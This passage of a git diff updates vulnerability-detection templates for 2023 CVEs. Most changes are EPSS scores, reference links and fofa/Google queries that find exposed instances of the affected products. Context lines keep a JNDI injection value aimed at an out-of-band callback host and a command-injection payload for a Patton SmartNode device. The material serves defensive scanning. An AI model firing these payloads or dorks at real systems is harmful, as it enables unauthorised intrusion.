b/http/cves/2023/CVE-2023-37580.yaml index d956cb2bee..84e7faf058 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -21,8 +21,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-37580 cwe-id: CWE-79 - epss-score: 0.30373 - epss-percentile: 0.96831 + epss-score: 0.30867 + epss-percentile: 0.96974 cpe: cpe:2.3:a:zimbra:zimbra:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml index 6ccd550087..10a859096f 100644 --- a/http/cves/2023/CVE-2023-37629.yaml +++ b/http/cves/2023/CVE-2023-37629.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-37629 cwe-id: CWE-434 - epss-score: 0.13221 - epss-percentile: 0.95417 + epss-score: 0.09817 + epss-percentile: 0.94811 cpe: cpe:2.3:a:simple_online_piggery_management_system_project:simple_online_piggery_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true @@ -27,7 +27,6 @@ info: vendor: simple_online_piggery_management_system_project product: simple_online_piggery_management_system tags: cve2023,cve,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_project - variables: string: "CVE-2023-37629" diff --git a/http/cves/2023/CVE-2023-3765.yaml b/http/cves/2023/CVE-2023-3765.yaml index 383af58111..8be52fb07f 100644 --- a/http/cves/2023/CVE-2023-3765.yaml +++ b/http/cves/2023/CVE-2023-3765.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2023-3765 cwe-id: CWE-36 - epss-score: 0.00951 - epss-percentile: 0.82826 + epss-score: 0.01303 + epss-percentile: 0.85869 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,8 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" + fofa-query: title="mlflow" + google-query: intitle:"mlflow" tags: cve2023,cve,mflow,lfi,huntr,lfprojects http: diff --git a/http/cves/2023/CVE-2023-37679.yaml b/http/cves/2023/CVE-2023-37679.yaml index 0dc83540b4..5257ce52bb 100644 --- a/http/cves/2023/CVE-2023-37679.yaml +++ b/http/cves/2023/CVE-2023-37679.yaml @@ -11,13 +11,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-37679 - http://mirth.com - http://nextgen.com + - http://packetstormsecurity.com/files/176920/Mirth-Connect-4.4.0-Remote-Command-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-37679 cwe-id: CWE-77 - epss-score: 0.07033 - epss-percentile: 0.93304 + epss-score: 0.07052 + epss-percentile: 0.9396 cpe: cpe:2.3:a:nextgen:mirth_connect:4.3.0:*:*:*:*:*:*:* metadata: verified: true @@ -25,7 +26,9 @@ info: vendor: nextgen product: mirth_connect shodan-query: title:"mirth connect administrator" - tags: cve2023,cve,nextgen,rce + fofa-query: title="mirth connect administrator" + google-query: intitle:"mirth connect administrator" + tags: packetstorm,cve2023,cve,nextgen,rce http: - raw: diff --git a/http/cves/2023/CVE-2023-37728.yaml b/http/cves/2023/CVE-2023-37728.yaml index d9ffe9ebbf..0e9c7058d9 100644 --- a/http/cves/2023/CVE-2023-37728.yaml +++ b/http/cves/2023/CVE-2023-37728.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-37728 cwe-id: CWE-79 - epss-score: 0.00259 - epss-percentile: 0.65066 + epss-score: 0.0035 + epss-percentile: 0.71791 cpe: cpe:2.3:a:icewarp:icewarp:10.2.1:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: vendor: icewarp product: icewarp shodan-query: http.favicon.hash:2144485375 + fofa-query: title="icewarp" + google-query: intitle:"icewarp" tags: cve,cve2023,icearp,icewarp,xss http: diff --git a/http/cves/2023/CVE-2023-37979.yaml b/http/cves/2023/CVE-2023-37979.yaml index 79489bac76..5be50160fd 100644 --- a/http/cves/2023/CVE-2023-37979.yaml +++ b/http/cves/2023/CVE-2023-37979.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-37979 cwe-id: CWE-79 epss-score: 0.00085 - epss-percentile: 0.34736 + epss-percentile: 0.3599 cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: vendor: ninjaforms product: ninja_forms framework: wordpress + shodan-query: http.html:/wp-content/plugins/ninja-forms/ + fofa-query: body=/wp-content/plugins/ninja-forms/ publicwww-query: /wp-content/plugins/ninja-forms/ tags: cve2023,cve,wpscan,packetstorm,xss,wordpress,authenticated,wp-plugin,wp,ninjaforms diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml index 8ce4a8ecd9..053ee7a608 100644 --- a/http/cves/2023/CVE-2023-38035.yaml +++ b/http/cves/2023/CVE-2023-38035.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-38035 cwe-id: CWE-863 - epss-score: 0.97187 - epss-percentile: 0.99782 + epss-score: 0.97506 + epss-percentile: 0.99983 cpe: cpe:2.3:a:ivanti:mobileiron_sentry:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: ivanti product: mobileiron_sentry shodan-query: 'html:"Note: Requires a local Sentry administrative user"' + fofa-query: 'body="note: requires a local sentry administrative user"' tags: cve2023,cve,packetstorm,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast variables: oast: "{{interactsh-url}}/?" diff --git a/http/cves/2023/CVE-2023-38203.yaml b/http/cves/2023/CVE-2023-38203.yaml index 742e2bdbf6..bbc05135e8 100644 --- a/http/cves/2023/CVE-2023-38203.yaml +++ b/http/cves/2023/CVE-2023-38203.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-38203 cwe-id: CWE-502 - epss-score: 0.517 - epss-percentile: 0.97465 + epss-score: 0.97037 + epss-percentile: 0.99755 cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:* metadata: max-request: 1 @@ -28,8 +28,8 @@ info: product: coldfusion shodan-query: http.component:"Adobe ColdFusion" fofa-query: app="Adobe-ColdFusion" + google-query: intitle:"coldfusion administrator login" tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev - variables: callback: "{{interactsh-url}}" jndi: "ldap%3a//{{callback}}/zdfzfd" diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index 2eed763b87..cd108edfd0 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-38205 cwe-id: CWE-284,NVD-CWE-Other - epss-score: 0.93471 - epss-percentile: 0.99038 + epss-score: 0.922 + epss-percentile: 0.98936 cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: product: coldfusion shodan-query: http.component:"Adobe ColdFusion" fofa-query: app="Adobe-ColdFusion" + google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev http: diff --git a/http/cves/2023/CVE-2023-3836.yaml b/http/cves/2023/CVE-2023-3836.yaml index 0e3e21c1d4..3094b803ce 100644 --- a/http/cves/2023/CVE-2023-3836.yaml +++ b/http/cves/2023/CVE-2023-3836.yaml @@ -13,13 +13,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-3836 - https://vuldb.com/?ctiid.235162 - https://vuldb.com/?id.235162 + - https://github.com/1f3lse/taiE classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-3836 cwe-id: CWE-434 - epss-score: 0.02584 - epss-percentile: 0.89161 + epss-score: 0.02637 + epss-percentile: 0.90348 cpe: cpe:2.3:a:dahuasecurity:smart_parking_management:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +28,7 @@ info: vendor: dahuasecurity product: smart_parking_management shodan-query: html:"/WPMS/asset" + fofa-query: body="/wpms/asset" zoomeye-query: /WPMS/asset tags: cve2023,cve,dahua,fileupload,intrusive,rce,dahuasecurity variables: diff --git a/http/cves/2023/CVE-2023-3843.yaml b/http/cves/2023/CVE-2023-3843.yaml index 64bd0a4275..d91014ab9d 100644 --- a/http/cves/2023/CVE-2023-3843.yaml +++ b/http/cves/2023/CVE-2023-3843.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3843 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.60949 + epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38433.yaml b/http/cves/2023/CVE-2023-38433.yaml index f12d8cd284..4a34e6d213 100644 --- a/http/cves/2023/CVE-2023-38433.yaml +++ b/http/cves/2023/CVE-2023-38433.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-38433 cwe-id: CWE-798 - epss-score: 0.0029 - epss-percentile: 0.6843 + epss-score: 0.0031 + epss-percentile: 0.69984 cpe: cpe:2.3:o:fujitsu:ip-he950e_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3845.yaml b/http/cves/2023/CVE-2023-3845.yaml index a73a85af29..0233a5617a 100644 --- a/http/cves/2023/CVE-2023-3845.yaml +++ b/http/cves/2023/CVE-2023-3845.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-3845 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.60949 + epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3847.yaml b/http/cves/2023/CVE-2023-3847.yaml index 0480cddc9c..1cb514d945 100644 --- a/http/cves/2023/CVE-2023-3847.yaml +++ b/http/cves/2023/CVE-2023-3847.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-3847 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.60949 + epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3848.yaml b/http/cves/2023/CVE-2023-3848.yaml index ccc2641897..2ee27c1645 100644 --- a/http/cves/2023/CVE-2023-3848.yaml +++ b/http/cves/2023/CVE-2023-3848.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-3848 cwe-id: CWE-79 - epss-score: 0.00237 - epss-percentile: 0.61873 + epss-score: 0.00235 + epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3849.yaml b/http/cves/2023/CVE-2023-3849.yaml index 6e04c0a610..b25bb87869 100644 --- a/http/cves/2023/CVE-2023-3849.yaml +++ b/http/cves/2023/CVE-2023-3849.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-3849 cwe-id: CWE-79 - epss-score: 0.00237 - epss-percentile: 0.61873 + epss-score: 0.00235 + epss-percentile: 0.61597 cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-38501.yaml b/http/cves/2023/CVE-2023-38501.yaml index 2ad005fee4..0b11d5aa02 100644 --- a/http/cves/2023/CVE-2023-38501.yaml +++ b/http/cves/2023/CVE-2023-38501.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-38501 cwe-id: CWE-79 - epss-score: 0.00271 - epss-percentile: 0.64421 + epss-score: 0.00198 + epss-percentile: 0.57252 cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: vendor: copyparty_project product: copyparty shodan-query: title:"copyparty" + fofa-query: title="copyparty" + google-query: intitle:"copyparty" tags: cve,cve2023,packetstorm,copyparty,xss,oss,copyparty_project http: diff --git a/http/cves/2023/CVE-2023-38646.yaml b/http/cves/2023/CVE-2023-38646.yaml index 0736c3b2bc..15ef4b2699 100644 --- a/http/cves/2023/CVE-2023-38646.yaml +++ b/http/cves/2023/CVE-2023-38646.yaml @@ -21,8 +21,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-38646 - epss-score: 0.62661 - epss-percentile: 0.97553 + epss-score: 0.91302 + epss-percentile: 0.98865 cpe: cpe:2.3:a:metabase:metabase:*:*:*:*:-:*:*:* metadata: verified: true @@ -31,6 +31,7 @@ info: product: metabase shodan-query: http.title:"Metabase" fofa-query: app="Metabase" + google-query: intitle:"metabase" tags: cve2023,cve,metabase,oss,rce variables: file: "./plugins/vertica.metabase-driver.jar" diff --git a/http/cves/2023/CVE-2023-38964.yaml b/http/cves/2023/CVE-2023-38964.yaml index 17331d3e27..c959bc28b0 100644 --- a/http/cves/2023/CVE-2023-38964.yaml +++ b/http/cves/2023/CVE-2023-38964.yaml @@ -18,14 +18,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-38964 cwe-id: CWE-79 - epss-score: 0.00046 - epss-percentile: 0.15636 + epss-score: 0.00071 + epss-percentile: 0.30433 cpe: cpe:2.3:a:creativeitem:academy_lms:6.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: creativeitem product: academy_lms + shodan-query: http.html:"academy lms" fofa-query: body="Academy LMS" tags: cve2023,cve,academylms,xss,creativeitem diff --git a/http/cves/2023/CVE-2023-39002.yaml b/http/cves/2023/CVE-2023-39002.yaml index 4df0a4e64e..a76c9f68a0 100644 --- a/http/cves/2023/CVE-2023-39002.yaml +++ b/http/cves/2023/CVE-2023-39002.yaml @@ -15,14 +15,16 @@ info: cvss-score: 6.1 cve-id: CVE-2023-39002 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26117 + epss-score: 0.00071 + epss-percentile: 0.30401 cpe: cpe:2.3:a:opnsense:opnsense:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: opnsense product: opnsense shodan-query: title:"OPNsense" + fofa-query: title="opnsense" + google-query: intitle:"opnsense" tags: cve2023,cve,opnsense,xss,authenticated,rce http: diff --git a/http/cves/2023/CVE-2023-39026.yaml b/http/cves/2023/CVE-2023-39026.yaml index 2387e68505..c1d2641c2a 100644 --- a/http/cves/2023/CVE-2023-39026.yaml +++ b/http/cves/2023/CVE-2023-39026.yaml @@ -21,14 +21,14 @@ info: cvss-score: 7.5 cve-id: CVE-2023-39026 cwe-id: CWE-22 - epss-score: 0.05678 - epss-percentile: 0.9256 - cpe: cpe:2.3:a:filemage:filemage:*:*:*:*:*:*:*:* + epss-score: 0.04279 + epss-percentile: 0.92285 + cpe: cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - vendor: filemage - product: filemage + vendor: microsoft + product: windows shodan-query: title:"FileMage" tags: cve2023,cve,packetstorm,lfi,filemage diff --git a/http/cves/2023/CVE-2023-39108.yaml b/http/cves/2023/CVE-2023-39108.yaml index 5641a014db..65816e9130 100644 --- a/http/cves/2023/CVE-2023-39108.yaml +++ b/http/cves/2023/CVE-2023-39108.yaml @@ -10,13 +10,14 @@ info: - https://www.rconfig.com/downloads/rconfig-3.9.4.zip - https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_path_b.md - https://nvd.nist.gov/vuln/detail/CVE-2023-39108 + - https://github.com/zer0yu/CVE_Request classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-39108 cwe-id: CWE-918 - epss-score: 0.01332 - epss-percentile: 0.84573 + epss-score: 0.05213 + epss-percentile: 0.92994 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: true @@ -24,6 +25,8 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve2023,cve,rconfig,authenticated,ssrf,lfr http: diff --git a/http/cves/2023/CVE-2023-39109.yaml b/http/cves/2023/CVE-2023-39109.yaml index c2b4f687cf..69d5a2008e 100644 --- a/http/cves/2023/CVE-2023-39109.yaml +++ b/http/cves/2023/CVE-2023-39109.yaml @@ -16,8 +16,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-39109 cwe-id: CWE-918 - epss-score: 0.03449 - epss-percentile: 0.91267 + epss-score: 0.05213 + epss-percentile: 0.92994 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve2023,cve,rconfig,authenticated,ssrf,lfi http: diff --git a/http/cves/2023/CVE-2023-39110.yaml b/http/cves/2023/CVE-2023-39110.yaml index b624b4b962..5161381a08 100644 --- a/http/cves/2023/CVE-2023-39110.yaml +++ b/http/cves/2023/CVE-2023-39110.yaml @@ -16,8 +16,8 @@ info: cvss-score: 8.8 cve-id: CVE-2023-39110 cwe-id: CWE-918 - epss-score: 0.03449 - epss-percentile: 0.91267 + epss-score: 0.05213 + epss-percentile: 0.92994 cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: rconfig product: rconfig shodan-query: http.title:"rConfig" + fofa-query: title="rconfig" + google-query: intitle:"rconfig" tags: cve2023,cve,rconfig,authenticated,ssrf,lfr http: diff --git a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml index 2c2df7e7b4..950b60a1cd 100644 --- a/http/cves/2023/CVE-2023-39141.yaml +++ b/http/cves/2023/CVE-2023-39141.yaml @@ -14,13 +14,15 @@ info: - https://twitter.com/win3zz/status/1694239332465520684 - https://gist.github.com/JafarAkhondali/528fe6c548b78f454911fb866b23f66e - https://github.com/ziahamza/webui-aria2/blob/109903f0e2774cf948698cd95a01f77f33d7dd2c/node-server.js#L10 + - https://github.com/codeb0ss/CVE-2023-39141-PoC + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-39141 cwe-id: CWE-22 - epss-score: 0.00437 - epss-percentile: 0.72033 + epss-score: 0.005 + epss-percentile: 0.76302 cpe: cpe:2.3:a:ziahamza:webui-aria2:-:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +30,8 @@ info: vendor: ziahamza product: webui-aria2 shodan-query: title:"Aria2 WebUI" + fofa-query: title="aria2 webui" + google-query: intitle:"aria2 webui" tags: cve2023,cve,lfi,unauth,aria2,webui,ziahamza http: diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index 62af18ad92..7c0df7cb84 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-39143 cwe-id: CWE-22 - epss-score: 0.93991 - epss-percentile: 0.99092 + epss-score: 0.95367 + epss-percentile: 0.9936 cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: papercut product: papercut_mf shodan-query: html:"content=\"PaperCut\"" + fofa-query: body="papercut" tags: cve2023,cve,lfi,papercut http: diff --git a/http/cves/2023/CVE-2023-3936.yaml b/http/cves/2023/CVE-2023-3936.yaml index 4711e6a136..5b82e3d346 100644 --- a/http/cves/2023/CVE-2023-3936.yaml +++ b/http/cves/2023/CVE-2023-3936.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-3936 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26189 + epss-score: 0.00071 + epss-percentile: 0.30429 cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index 46a1d44d1c..8cbd252f43 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-39361 cwe-id: CWE-89 - epss-score: 0.13486 - epss-percentile: 0.95109 + epss-score: 0.233 + epss-percentile: 0.9655 cpe: cpe:2.3:a:cacti:cacti:1.2.24:*:*:*:*:*:*:* metadata: verified: true @@ -28,6 +28,8 @@ info: vendor: cacti product: cacti shodan-query: title:"Login to Cacti" + fofa-query: icon_hash="-1797138069" + google-query: intitle:"cacti" tags: cve2023,cve,cacti,sqli http: diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index 81eb0d53a8..33441386ac 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-39598 cwe-id: CWE-79 - epss-score: 0.02804 - epss-percentile: 0.90411 + epss-score: 0.05054 + epss-percentile: 0.92885 cpe: cpe:2.3:a:icewarp:webclient:10.2.1:*:*:*:*:*:*:* metadata: verified: "true" @@ -27,6 +27,8 @@ info: vendor: icewarp product: webclient shodan-query: title:"icewarp" + fofa-query: title="icewarp" + google-query: intitle:"icewarp" tags: cve2023,cve,xss,icewarp http: diff --git a/http/cves/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml index af6be74e1c..7b736919f8 100644 --- a/http/cves/2023/CVE-2023-39600.yaml +++ b/http/cves/2023/CVE-2023-39600.yaml @@ -18,14 +18,16 @@ info: cvss-score: 6.1 cve-id: CVE-2023-39600 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26117 + epss-score: 0.00071 + epss-percentile: 0.30401 cpe: cpe:2.3:a:icewarp:icewarp:11.4.6.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: icewarp product: icewarp shodan-query: title:"icewarp" + fofa-query: title="icewarp" + google-query: intitle:"icewarp" tags: cve,cve2023,icewarp,xss http: diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index cbcc8f15ce..61a62b5d5a 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-39676 cwe-id: CWE-79 epss-score: 0.00167 - epss-percentile: 0.53357 + epss-percentile: 0.53401 cpe: cpe:2.3:a:fieldthemes:fieldpopupnewsletter:1.0.0:*:*:*:*:prestashop:*:* metadata: verified: "true" @@ -27,6 +27,7 @@ info: product: fieldpopupnewsletter framework: prestashop shodan-query: html:"fieldpopupnewsletter" + fofa-query: body="fieldpopupnewsletter" tags: cve2023,cve,prestashop,xss,fieldthemes http: diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml index c39e47d90e..d972e97231 100644 --- a/http/cves/2023/CVE-2023-39677.yaml +++ b/http/cves/2023/CVE-2023-39677.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-39677 - epss-score: 0.00632 - epss-percentile: 0.76782 + epss-score: 0.00767 + epss-percentile: 0.81177 cpe: cpe:2.3:a:simpleimportproduct_project:simpleimportproduct:6.2.9:*:*:*:*:prestashop:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-39700.yaml b/http/cves/2023/CVE-2023-39700.yaml index 212000700f..b00e4c04a2 100644 --- a/http/cves/2023/CVE-2023-39700.yaml +++ b/http/cves/2023/CVE-2023-39700.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-39700 cwe-id: CWE-79 epss-score: 0.00103 - epss-percentile: 0.41615 + epss-percentile: 0.42039 cpe: cpe:2.3:a:icewarp:mail_server:10.4.5:*:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,8 @@ info: vendor: icewarp product: mail_server shodan-query: http.title:"IceWarp Server Administration" + fofa-query: title="icewarp server administration" + google-query: intitle:"icewarp server administration" tags: cve,cve2023,icewarp,xss,unauth http: diff --git a/http/cves/2023/CVE-2023-39796.yaml b/http/cves/2023/CVE-2023-39796.yaml index 7992ca201b..7bdeafadf7 100644 --- a/http/cves/2023/CVE-2023-39796.yaml +++ b/http/cves/2023/CVE-2023-39796.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-39796 cwe-id: CWE-89 - epss-score: 0.03223 - epss-percentile: 0.90219 + epss-score: 0.05018 + epss-percentile: 0.92857 cpe: cpe:2.3:a:wbce:wbce_cms:1.6.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-40208.yaml b/http/cves/2023/CVE-2023-40208.yaml index 6bcd5cd92a..2a4ed4126a 100644 --- a/http/cves/2023/CVE-2023-40208.yaml +++ b/http/cves/2023/CVE-2023-40208.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-40208 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26209 + epss-score: 0.00071 + epss-percentile: 0.30433 cpe: cpe:2.3:a:urosevic:stock_ticker:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,9 @@ info: vendor: urosevic product: stock_ticker framework: wordpress + shodan-query: http.html:/wp-content/plugins/stock-ticker/ + fofa-query: body=/wp-content/plugins/stock-ticker/ + publicwww-query: /wp-content/plugins/stock-ticker/ tags: cve2023,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,xss,urosevic http: diff --git a/http/cves/2023/CVE-2023-40355.yaml b/http/cves/2023/CVE-2023-40355.yaml index 15ebb9b3ec..4a57276e75 100644 --- a/http/cves/2023/CVE-2023-40355.yaml +++ b/http/cves/2023/CVE-2023-40355.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-40355 cwe-id: CWE-79 epss-score: 0.00587 - epss-percentile: 0.77728 + epss-percentile: 0.78117 cpe: cpe:2.3:a:axigen:axigen_mobile_webmail:*:*:*:*:*:*:*:* metadata: verified: true @@ -23,6 +23,7 @@ info: vendor: axigen product: axigen_mobile_webmail shodan-query: http.favicon.hash:-1247684400 + fofa-query: icon_hash=-1247684400 tags: cve,cve2023,xss,axigen,webmail http: diff --git a/http/cves/2023/CVE-2023-40779.yaml b/http/cves/2023/CVE-2023-40779.yaml index 02e680a862..3148a7c620 100644 --- a/http/cves/2023/CVE-2023-40779.yaml +++ b/http/cves/2023/CVE-2023-40779.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-40779 cwe-id: CWE-601 - epss-score: 0.00869 - epss-percentile: 0.8059 + epss-score: 0.06641 + epss-percentile: 0.93801 cpe: cpe:2.3:a:icewarp:deep_castle_g2:13.0.1.2:*:*:*:*:*:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: icewarp product: deep_castle_g2 shodan-query: title:"IceWarp" + fofa-query: title="icewarp" + google-query: intitle:"icewarp" tags: cve2023,cve,icewarp,redirect http: diff --git a/http/cves/2023/CVE-2023-4110.yaml b/http/cves/2023/CVE-2023-4110.yaml index 2c5df20248..e39b936fcd 100644 --- a/http/cves/2023/CVE-2023-4110.yaml +++ b/http/cves/2023/CVE-2023-4110.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-4110 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.60949 + epss-percentile: 0.61597 cpe: cpe:2.3:a:phpjabbers:availability_booking_calendar:5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-41109.yaml b/http/cves/2023/CVE-2023-41109.yaml index 16369ce31e..d7d3b8bbb0 100644 --- a/http/cves/2023/CVE-2023-41109.yaml +++ b/http/cves/2023/CVE-2023-41109.yaml @@ -21,14 +21,14 @@ info: cvss-score: 9.8 cve-id: CVE-2023-41109 cwe-id: CWE-78 - epss-score: 0.23094 - epss-percentile: 0.96433 - cpe: cpe:2.3:o:patton:smartnode_sn200_firmware:*:*:*:*:*:*:*:* + epss-score: 0.33157 + epss-percentile: 0.97044 + cpe: cpe:2.3:h:patton:smartnode_sn200:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: patton - product: smartnode_sn200_firmware + product: smartnode_sn200 tags: cve,cve2023,smartnode,voip,patton variables: payload: "echo CVE-2023-41109 | md5sum" diff --git a/http/cves/2023/CVE-2023-4111.yaml b/http/cves/2023/CVE-2023-4111.yaml index 1404f4d807..9787d55ceb 100644 --- a/http/cves/2023/CVE-2023-4111.yaml +++ b/http/cves/2023/CVE-2023-4111.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-4111 cwe-id: CWE-79 epss-score: 0.00235 - epss-percentile: 0.60949 + epss-percentile: 0.61597 cpe: 